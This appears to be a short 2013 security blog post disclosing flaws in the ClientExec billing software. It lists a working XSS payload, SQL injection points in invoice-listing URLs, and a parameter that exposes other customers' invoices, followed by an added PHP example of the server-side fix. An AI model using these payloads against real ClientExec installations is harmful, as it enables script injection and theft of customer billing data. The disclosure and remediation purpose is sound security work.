localhost
Random ramblings from someone working in InfoSec

contact me@localhost.re
2013/05/24

So I decided to give ClientExec a try. You know what kind of try :)

Let's start with XSS:

/order.php?step=subsearch&tld=false&name=1'){}}alert('xss');function+x(){if('

Some SQLi (log in as a client and set a valid sessionHash):

/index.php?sessionHash=&fuse=billing&sort=1,2&action=GetInvoiceEntries&invoiceid=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&sort=[SQLi]
/index.php?sessionHash=&fuse=billing&action=GetUnInvoicedList&sort=[SQLi]

And uhm, let's view invoices of other users:

/index.php?sessionHash=&fuse=billing&action=GetInvoiceList&customerid=[Customer]
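
For the sort and customerid parameters above, the fix on the server side usually looks something like the following. This is an added example, not ClientExec's code: the invoice table, its columns, the session keys and getInvoiceList() are all assumptions, and the rows are constructed sample data.

```php
<?php
// Added illustration, not ClientExec code. Schema, session keys and
// getInvoiceList() are hypothetical; the rows below are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE invoice (id INTEGER PRIMARY KEY, customerid INTEGER, amount REAL, duedate TEXT)');
$db->exec("INSERT INTO invoice VALUES (1, 10, 25.0, '2013-06-01'), (2, 10, 5.0, '2013-05-01'), (3, 11, 99.0, '2013-05-15')");

// ORDER BY cannot take a bound parameter, so the request value is only used
// as a lookup key; the SQL fragment always comes from this map.
const SORT_COLUMNS = ['id' => 'id', 'amount' => 'amount', 'due' => 'duedate'];

function getInvoiceList(PDO $db, array $session, array $request): array
{
    // The customer comes from the server-side session. A customerid in the
    // request is honoured only for staff, never for a client login.
    $customerId = (int) $session['userid'];
    if (!empty($session['is_admin']) && isset($request['customerid'])) {
        $customerId = (int) $request['customerid'];
    }

    // Anything that is not a known key (including arrays) falls back to the default.
    $sortKey = is_string($request['sort'] ?? null) ? $request['sort'] : 'id';
    $column  = SORT_COLUMNS[$sortKey] ?? 'id';
    $dir     = (($request['dir'] ?? '') === 'desc') ? 'DESC' : 'ASC';

    $stmt = $db->prepare(
        "SELECT id, customerid, amount FROM invoice WHERE customerid = :cid ORDER BY $column $dir"
    );
    $stmt->execute([':cid' => $customerId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$client = ['userid' => 10, 'is_admin' => false];

// Ordinary request from the logged-in client.
print_r(getInvoiceList($db, $client, ['sort' => 'amount', 'dir' => 'desc']));

// Request shaped like the ones above: the sort value is not a known key and
// the customerid is not taken from a client's request.
print_r(getInvoiceList($db, $client, ['sort' => '1,2', 'customerid' => '11']));
```

Numeric parameters such as invoiceid get the same treatment as `:cid` here: bound as a parameter and always combined with the session's customer in the WHERE clause.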

A lot more vulns, of different types, were found. Stay tuned.